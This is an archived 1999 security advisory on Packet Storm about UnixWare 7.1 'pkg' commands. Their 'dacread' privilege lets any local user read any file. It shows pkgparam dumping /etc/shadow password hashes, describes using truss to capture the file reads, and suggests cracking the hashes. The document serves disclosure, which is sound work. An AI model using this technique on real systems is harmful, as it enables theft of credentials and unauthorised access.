exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

unixware.pkg.txt

unixware.pkg.txt
Posted Dec 6, 1999
Authored by Brock Tellier

The majority of the UnixWare "pkg" command, such as pkginfo, pkgcat, pkgparam, etc, are vulnerable to a bug which will allow any user to read any file on the system as a result of their additional "dacread" permission in the privs file.

tags | exploit
systems | unixware
SHA-256 | eed02a6b7a86a7d3af4ec8b75523b340d16c847a4c9f0c75df048402aa31a77e

unixware.pkg.txt

Change Mirror Download
Greetings,

OVERVIEW
Any user may read any file on the system.

BACKGROUND
Only UnixWare 7.1 has been tested.

DETAILS
As previously stated, UnixWare binaries gain additional privileges via
standard suid/sgid AND /etc/security/tcb/privs. The majority of the UnixWare
"pkg" command, such as pkginfo, pkgcat, pkgparam, etc, are vulnerable to
a bug
which will allow any user to read any file on the system as a result of their
additional "dacread" permission in the privs file.

The dacread permission allows a process to override the Discretionary Access
Controls (DAC) for read-only operations. Basically, a process with the
dacread permissions is able to bypass the mode bits and ownership on a file,
but only for reading it. A process with dacwrite permissions can bypass mode
bits to write to or execute that file.

I'm pretty sure that the bugs I found in the pkg commands were introduced by
their addition to the privs file. As far as I can tell, there is virtual ly no
reason for them to be able to read any file on the system.


All around, this additional privilege thing, well, sucks. Consider now that
the truss(1) command will allow the user to see any file i/o that happens

between a process and the system since it isn't suid/sgid. Thus, if there is
*any* way that you can make pkg* read from a file, even if the output is never
printed, you can examine truss output to get the file's contents.

EXPLOIT
The worst offender of pkg* is pkgparam, which will print the contents of a
file to stdout, though I've been able to get most of the pkg program to read
from /etc/shadow in one way or another and grab the contents with truss.

bash-2.02$ ls -la /bin/pkgparam
-r-xr-xr-x 1 root sys 166784 May 21 1999
/bin/pkgparam
bash-2.02$ /bin/pkgparam -f /etc/shadow
Dy0l3OC7XHsj.:10925::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
BgusHRQZ9MH2U:10878::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
nv.Xrh2V3vArc:10882::::::
ozT.yeRe1/dxY:10882::::::
RinwpQfqabYbc:10928::::::
bash-2.02$

Now just concatenate the first field of /etc/passwd with this file and run
your favorite cracker.

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier@usa.net


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close